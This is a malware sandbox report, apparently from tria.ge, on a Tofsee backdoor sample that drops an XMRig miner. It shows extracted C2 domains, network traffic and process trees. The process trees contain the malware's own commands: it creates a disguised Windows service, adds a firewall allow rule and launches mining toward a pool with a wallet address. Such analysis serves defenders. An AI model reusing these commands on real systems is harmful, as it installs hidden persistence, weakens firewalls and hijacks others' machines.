Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

file.exe

windows7-x64

10

file.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    10/02/2023, 14:00 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    357KB

  • MD5

    417696104a850fb6d641959c9e084e0f

  • SHA1

    99f739f830c5555b8e00c8d40dca115f14d5d780

  • SHA256

    9dbd56890ad94f339c4b41633cb919614717aa56ef6fd109823f5b8fc8cb64cc

  • SHA512

    c7eaf00e1104a3d9d74dc6f3658b7af309979db64858ff339db511039b965e420056c21fb315bfe4b4e2bb98432d4ccb9f1b565871b33cab2f130cdc368186a2

  • SSDEEP

    3072:/9N5bk+xtGNaL/ROaFjXrEThTVDsSKnxkv4lZC9nf6NT2UU:l5LgaLkaFjkhJYSKxm4lOnfWT

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs 1 IoCs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 2 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:900
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ydfgsdws\
      2⤵
        PID:1520
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nyuzqjvk.exe" C:\Windows\SysWOW64\ydfgsdws\
        2⤵
          PID:1240
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create ydfgsdws binPath= "C:\Windows\SysWOW64\ydfgsdws\nyuzqjvk.exe /d\"C:\Users\Admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:1300
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description ydfgsdws "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:272
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start ydfgsdws
          2⤵
          • Launches sc.exe
          PID:1644
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:1856
      • C:\Windows\SysWOW64\ydfgsdws\nyuzqjvk.exe
        C:\Windows\SysWOW64\ydfgsdws\nyuzqjvk.exe /d"C:\Users\Admin\AppData\Local\Temp\file.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:804
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:316
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1520

      Network

      • flag-us
        DNS
        microsoft.com
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        microsoft.com
        IN A
        Response
        microsoft.com
        IN A
        20.112.52.29
        microsoft.com
        IN A
        20.81.111.85
        microsoft.com
        IN A
        20.84.181.62
        microsoft.com
        IN A
        20.103.85.33
        microsoft.com
        IN A
        20.53.203.50
      • flag-us
        DNS
        microsoft.com
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        microsoft.com
        IN MX
        Response
        microsoft.com
        IN MX
        microsoft-commail protectionoutlook�
      • flag-us
        DNS
        microsoft-com.mail.protection.outlook.com
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        microsoft-com.mail.protection.outlook.com
        IN A
        Response
        microsoft-com.mail.protection.outlook.com
        IN A
        104.47.54.36
        microsoft-com.mail.protection.outlook.com
        IN A
        40.93.207.5
        microsoft-com.mail.protection.outlook.com
        IN A
        52.101.40.29
        microsoft-com.mail.protection.outlook.com
        IN A
        40.93.207.1
        microsoft-com.mail.protection.outlook.com
        IN A
        40.93.212.0
        microsoft-com.mail.protection.outlook.com
        IN A
        104.47.53.36
      • flag-us
        DNS
        svartalfheim.top
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        svartalfheim.top
        IN A
        Response
        svartalfheim.top
        IN A
        46.173.218.115
      • flag-us
        DNS
        yahoo.com
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        yahoo.com
        IN MX
        Response
        yahoo.com
        IN MX
        mta7am0yahoodnsnet
        yahoo.com
        IN MX
        mta6�.
        yahoo.com
        IN MX
        mta5�.
      • flag-us
        DNS
        mta7.am0.yahoodns.net
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        mta7.am0.yahoodns.net
        IN A
        Response
        mta7.am0.yahoodns.net
        IN A
        67.195.204.74
        mta7.am0.yahoodns.net
        IN A
        67.195.228.110
        mta7.am0.yahoodns.net
        IN A
        67.195.228.106
        mta7.am0.yahoodns.net
        IN A
        67.195.204.77
        mta7.am0.yahoodns.net
        IN A
        67.195.204.72
        mta7.am0.yahoodns.net
        IN A
        98.136.96.76
        mta7.am0.yahoodns.net
        IN A
        67.195.204.73
        mta7.am0.yahoodns.net
        IN A
        98.136.96.74
      • flag-us
        DNS
        13.71.61.154.dnsbl.sorbs.net
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        13.71.61.154.dnsbl.sorbs.net
        IN A
        Response
      • flag-us
        DNS
        13.71.61.154.bl.spamcop.net
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        13.71.61.154.bl.spamcop.net
        IN A
        Response
      • flag-us
        DNS
        13.71.61.154.zen.spamhaus.org
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        13.71.61.154.zen.spamhaus.org
        IN A
        Response
      • flag-us
        DNS
        13.71.61.154.sbl-xbl.spamhaus.org
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        13.71.61.154.sbl-xbl.spamhaus.org
        IN A
        Response
      • flag-us
        DNS
        13.71.61.154.cbl.abuseat.org
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        13.71.61.154.cbl.abuseat.org
        IN A
        Response
      • flag-nl
        GET
        http://www.google.com/
        svchost.exe
        Remote address:
        142.251.39.100:80
        Request
        GET / HTTP/1.1
        Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
        Accept-Language: en
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
        Host: www.google.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Fri, 10 Feb 2023 14:02:34 GMT
        Expires: -1
        Cache-Control: private, max-age=0
        Content-Type: text/html; charset=UTF-8
        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
        Content-Encoding: gzip
        Server: gws
        Content-Length: 1920
        X-XSS-Protection: 0
        X-Frame-Options: SAMEORIGIN
        Set-Cookie: 1P_JAR=2023-02-10-14; expires=Sun, 12-Mar-2023 14:02:34 GMT; path=/; domain=.google.com; Secure
        Set-Cookie: AEC=ARSKqsIvFI4xd5iDkZiB6nGPVQ-dTc5EYehNybeK6-1bijajPZKiQfDJ; expires=Wed, 09-Aug-2023 14:02:34 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
        Set-Cookie: NID=511=TuKlgfbn4aLHESybbq6vUylZ00QKvJswg2JmLMgOWJx7bKwgBfVlqwXeBF4713rF1S6PTKhT0cd2jW1G-MV-pbgbUDGElvJKT5-VS38gssG_WFT8VrdjLMh7dAds2CFb2EZNhgKg9NaFXq_oiBQZ4bdPHbO0SHdCrbYSH8KxJUU; expires=Sat, 12-Aug-2023 14:02:34 GMT; path=/; domain=.google.com; HttpOnly
      • flag-nl
        GET
        http://www.google.com/
        svchost.exe
        Remote address:
        142.251.39.100:80
        Request
        GET / HTTP/1.1
        Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
        Accept-Language: en
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
        Host: www.google.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Fri, 10 Feb 2023 14:02:34 GMT
        Expires: -1
        Cache-Control: private, max-age=0
        Content-Type: text/html; charset=UTF-8
        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
        Content-Encoding: gzip
        Server: gws
        Content-Length: 1919
        X-XSS-Protection: 0
        X-Frame-Options: SAMEORIGIN
        Set-Cookie: 1P_JAR=2023-02-10-14; expires=Sun, 12-Mar-2023 14:02:34 GMT; path=/; domain=.google.com; Secure
        Set-Cookie: AEC=ARSKqsLktur28Ie6AqVY2k6MJ8Ww_c1LLMCGTpebVX8rVjng2WNeIlCb_w; expires=Wed, 09-Aug-2023 14:02:34 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
        Set-Cookie: NID=511=cdRlBpdgZE91_lRLCMXFXXoVuLJeYLBb_IjXubG0AUITcvfay74frKsDDqALcLLogHJRFBqSJJ00-T6xqANCIKnNmtw71OBpQyhNkmziqU8owYjplsAueDzeJE1JksQnYV4__EP7mrPd6-NQhzLI3D-XSI5-VlklL20l0-mzNeo; expires=Sat, 12-Aug-2023 14:02:34 GMT; path=/; domain=.google.com; HttpOnly
      • flag-us
        DNS
        www.instagram.com
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        www.instagram.com
        IN A
        Response
        www.instagram.com
        IN CNAME
        geo-p42.instagram.com
        geo-p42.instagram.com
        IN CNAME
        z-p42-instagram.c10r.instagram.com
        z-p42-instagram.c10r.instagram.com
        IN A
        157.240.247.174
      • flag-us
        DNS
        google.com
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        google.com
        IN MX
        Response
        google.com
        IN MX
        smtp�
      • flag-us
        DNS
        smtp.google.com
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        smtp.google.com
        IN A
        Response
        smtp.google.com
        IN A
        142.250.27.27
        smtp.google.com
        IN A
        142.250.27.26
      • flag-us
        DNS
        fastpool.xyz
        -a
        Remote address:
        8.8.8.8:53
        Request
        fastpool.xyz
        IN A
        Response
        fastpool.xyz
        IN A
        213.91.128.133
      • flag-us
        DNS
        mail.ru
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        mail.ru
        IN MX
        Response
        mail.ru
        IN MX
        mxs�
      • flag-us
        DNS
        mxs.mail.ru
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        mxs.mail.ru
        IN A
        Response
        mxs.mail.ru
        IN A
        94.100.180.31
        mxs.mail.ru
        IN A
        217.69.139.150
      • flag-us
        DNS
        i.instagram.com
        svchost.exe
        Remote address:
        8.8.8.8:53
        Request
        i.instagram.com
        IN A
        Response
        i.instagram.com
        IN CNAME
        instagram.c10r.instagram.com
        instagram.c10r.instagram.com
        IN A
        157.240.247.63
      • flag-us
        DNS
        13.71.61.154.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        13.71.61.154.in-addr.arpa
        IN PTR
        Response
      • 20.112.52.29:80
        microsoft.com
        svchost.exe
        190 B
         92 B
         4
        2
      • 104.47.54.36:25
        microsoft-com.mail.protection.outlook.com
        svchost.exe
        152 B
         3
      • 46.173.218.115:443
        svartalfheim.top
        https
        svchost.exe
        355 B
         582 B
         5
        6
      • 80.66.75.254:485
        svchost.exe
        10.4kB
         569.9kB
         218
        422
      • 67.195.204.74:25
        mta7.am0.yahoodns.net
        svchost.exe
        152 B
         3
      • 176.113.115.239:429
        svchost.exe
        388 B
         1.4kB
         7
        7
      • 176.113.115.154:429
        svchost.exe
        33.0kB
         3.8kB
         40
        42
      • 176.113.115.155:429
        svchost.exe
        388 B
         1.4kB
         7
        7
      • 80.66.75.4:429
        svchost.exe
        388 B
         1.4kB
         7
        7
      • 176.113.115.135:429
        svchost.exe
        271 B
         437 B
         5
        5
      • 176.113.115.136:429
        svchost.exe
        35.9kB
         4.1kB
         42
        41
      • 142.251.39.100:80
        www.google.com
        svchost.exe
        152 B
         3
      • 142.251.39.100:80
        http://www.google.com/
        http
        svchost.exe
        643 B
         3.0kB
         6
        6

        HTTP Request

        GET http://www.google.com/

        HTTP Response

        200
      • 142.251.39.100:80
        www.google.com
        svchost.exe
        152 B
         3
      • 142.251.39.100:80
        http://www.google.com/
        http
        svchost.exe
        643 B
         3.0kB
         6
        6

        HTTP Request

        GET http://www.google.com/

        HTTP Response

        200
      • 142.251.39.100:80
        www.google.com
        svchost.exe
        152 B
         3
      • 157.240.247.174:443
        www.instagram.com
        tls
        svchost.exe
        2.4kB
         30.3kB
         23
        34
      • 142.250.27.27:25
        smtp.google.com
        svchost.exe
        152 B
         3
      • 213.91.128.133:10060
        fastpool.xyz
        -a
        842 B
         2.0kB
         7
        8
      • 94.100.180.31:25
        mxs.mail.ru
        svchost.exe
        152 B
         3
      • 157.240.247.63:443
        i.instagram.com
        tls
        svchost.exe
        1.5kB
         27.2kB
         17
        27
      • 80.66.75.254:485
        svchost.exe
      • 8.8.8.8:53
        microsoft.com
        dns
        svchost.exe
        59 B
         139 B
         1
        1

        DNS Request

        microsoft.com

        DNS Response

        20.112.52.29
        20.81.111.85
        20.84.181.62
        20.103.85.33
        20.53.203.50

      • 8.8.8.8:53
        microsoft.com
        dns
        svchost.exe
        59 B
         113 B
         1
        1

        DNS Request

        microsoft.com

      • 8.8.8.8:53
        microsoft-com.mail.protection.outlook.com
        dns
        svchost.exe
        87 B
         183 B
         1
        1

        DNS Request

        microsoft-com.mail.protection.outlook.com

        DNS Response

        104.47.54.36
        40.93.207.5
        52.101.40.29
        40.93.207.1
        40.93.212.0
        104.47.53.36

      • 8.8.8.8:53
        svartalfheim.top
        dns
        svchost.exe
        62 B
         78 B
         1
        1

        DNS Request

        svartalfheim.top

        DNS Response

        46.173.218.115

      • 8.8.8.8:53
        yahoo.com
        dns
        svchost.exe
        55 B
         134 B
         1
        1

        DNS Request

        yahoo.com

      • 8.8.8.8:53
        mta7.am0.yahoodns.net
        dns
        svchost.exe
        67 B
         195 B
         1
        1

        DNS Request

        mta7.am0.yahoodns.net

        DNS Response

        67.195.204.74
        67.195.228.110
        67.195.228.106
        67.195.204.77
        67.195.204.72
        98.136.96.76
        67.195.204.73
        98.136.96.74

      • 8.8.8.8:53
        13.71.61.154.dnsbl.sorbs.net
        dns
        svchost.exe
        74 B
         130 B
         1
        1

        DNS Request

        13.71.61.154.dnsbl.sorbs.net

      • 8.8.8.8:53
        13.71.61.154.bl.spamcop.net
        dns
        svchost.exe
        73 B
         126 B
         1
        1

        DNS Request

        13.71.61.154.bl.spamcop.net

      • 8.8.8.8:53
        13.71.61.154.zen.spamhaus.org
        dns
        svchost.exe
        75 B
         139 B
         1
        1

        DNS Request

        13.71.61.154.zen.spamhaus.org

      • 8.8.8.8:53
        13.71.61.154.sbl-xbl.spamhaus.org
        dns
        svchost.exe
        79 B
         143 B
         1
        1

        DNS Request

        13.71.61.154.sbl-xbl.spamhaus.org

      • 8.8.8.8:53
        13.71.61.154.cbl.abuseat.org
        dns
        svchost.exe
        74 B
         147 B
         1
        1

        DNS Request

        13.71.61.154.cbl.abuseat.org

      • 8.8.8.8:53
        www.instagram.com
        dns
        svchost.exe
        63 B
         136 B
         1
        1

        DNS Request

        www.instagram.com

        DNS Response

        157.240.247.174

      • 8.8.8.8:53
        google.com
        dns
        svchost.exe
        56 B
         77 B
         1
        1

        DNS Request

        google.com

      • 8.8.8.8:53
        smtp.google.com
        dns
        svchost.exe
        61 B
         93 B
         1
        1

        DNS Request

        smtp.google.com

        DNS Response

        142.250.27.27
        142.250.27.26

      • 8.8.8.8:53
        fastpool.xyz
        dns
        -a
        58 B
         74 B
         1
        1

        DNS Request

        fastpool.xyz

        DNS Response

        213.91.128.133

      • 8.8.8.8:53
        mail.ru
        dns
        svchost.exe
        53 B
         73 B
         1
        1

        DNS Request

        mail.ru

      • 8.8.8.8:53
        mxs.mail.ru
        dns
        svchost.exe
        57 B
         89 B
         1
        1

        DNS Request

        mxs.mail.ru

        DNS Response

        94.100.180.31
        217.69.139.150

      • 8.8.8.8:53
        i.instagram.com
        dns
        svchost.exe
        61 B
         106 B
         1
        1

        DNS Request

        i.instagram.com

        DNS Response

        157.240.247.63

      • 8.8.8.8:53
        13.71.61.154.in-addr.arpa
        dns
        71 B
         129 B
         1
        1

        DNS Request

        13.71.61.154.in-addr.arpa

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\nyuzqjvk.exe
        Filesize

        13.6MB

        MD5

        552ad1c9d370049c4b74c244a2d4e0f6

        SHA1

        c5a452cb86e719192ede43c50b8ad45e63da977a

        SHA256

        51257b1632bc98d496884ce32f73b7922e06fa5a7c757d7ee29db57892a0ff5b

        SHA512

        fdae23380544439f7e7e545345420db9cab86ee4b888bc4ece4b8bedd2e3cfc7a57b8db6d3dbb41739d838b833528bc6b5b9d9d9edacad52cba6507ef71204cf

        Download Submit

      • C:\Windows\SysWOW64\ydfgsdws\nyuzqjvk.exe
        Filesize

        13.6MB

        MD5

        552ad1c9d370049c4b74c244a2d4e0f6

        SHA1

        c5a452cb86e719192ede43c50b8ad45e63da977a

        SHA256

        51257b1632bc98d496884ce32f73b7922e06fa5a7c757d7ee29db57892a0ff5b

        SHA512

        fdae23380544439f7e7e545345420db9cab86ee4b888bc4ece4b8bedd2e3cfc7a57b8db6d3dbb41739d838b833528bc6b5b9d9d9edacad52cba6507ef71204cf

        Download Submit

      • memory/316-81-0x0000000001970000-0x0000000001B7F000-memory.dmp

        Filesize

        2.1MB

        Download

      • memory/316-84-0x00000000000E0000-0x00000000000E6000-memory.dmp

        Filesize

        24KB

        Download

      • memory/316-97-0x0000000000220000-0x0000000000227000-memory.dmp

        Filesize

        28KB

        Download

      • memory/316-94-0x0000000005AA0000-0x0000000005EAB000-memory.dmp

        Filesize

        4.0MB

        Download

      • memory/316-91-0x0000000000210000-0x0000000000215000-memory.dmp

        Filesize

        20KB

        Download

      • memory/316-90-0x00000000000C0000-0x00000000000D5000-memory.dmp

        Filesize

        84KB

        Download

      • memory/316-87-0x00000000000F0000-0x0000000000100000-memory.dmp

        Filesize

        64KB

        Download

      • memory/316-80-0x00000000000C0000-0x00000000000D5000-memory.dmp

        Filesize

        84KB

        Download

      • memory/316-73-0x00000000000C0000-0x00000000000D5000-memory.dmp

        Filesize

        84KB

        Download

      • memory/316-71-0x00000000000C0000-0x00000000000D5000-memory.dmp

        Filesize

        84KB

        Download

      • memory/804-75-0x000000000062D000-0x0000000000643000-memory.dmp

        Filesize

        88KB

        Download

      • memory/804-78-0x0000000000400000-0x0000000000485000-memory.dmp

        Filesize

        532KB

        Download

      • memory/900-58-0x0000000000400000-0x0000000000485000-memory.dmp

        Filesize

        532KB

        Download

      • memory/900-57-0x0000000000220000-0x0000000000233000-memory.dmp

        Filesize

        76KB

        Download

      • memory/900-66-0x00000000005FD000-0x0000000000613000-memory.dmp

        Filesize

        88KB

        Download

      • memory/900-67-0x0000000000400000-0x0000000000485000-memory.dmp

        Filesize

        532KB

        Download

      • memory/900-64-0x00000000005FD000-0x0000000000613000-memory.dmp

        Filesize

        88KB

        Download

      • memory/900-54-0x0000000075E11000-0x0000000075E13000-memory.dmp

        Filesize

        8KB

        Download

      • memory/900-56-0x00000000005FD000-0x0000000000613000-memory.dmp

        Filesize

        88KB

        Download

      • memory/1520-100-0x00000000000C0000-0x00000000001B1000-memory.dmp

        Filesize

        964KB

        Download

      • memory/1520-102-0x00000000000C0000-0x00000000001B1000-memory.dmp

        Filesize

        964KB

        Download

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.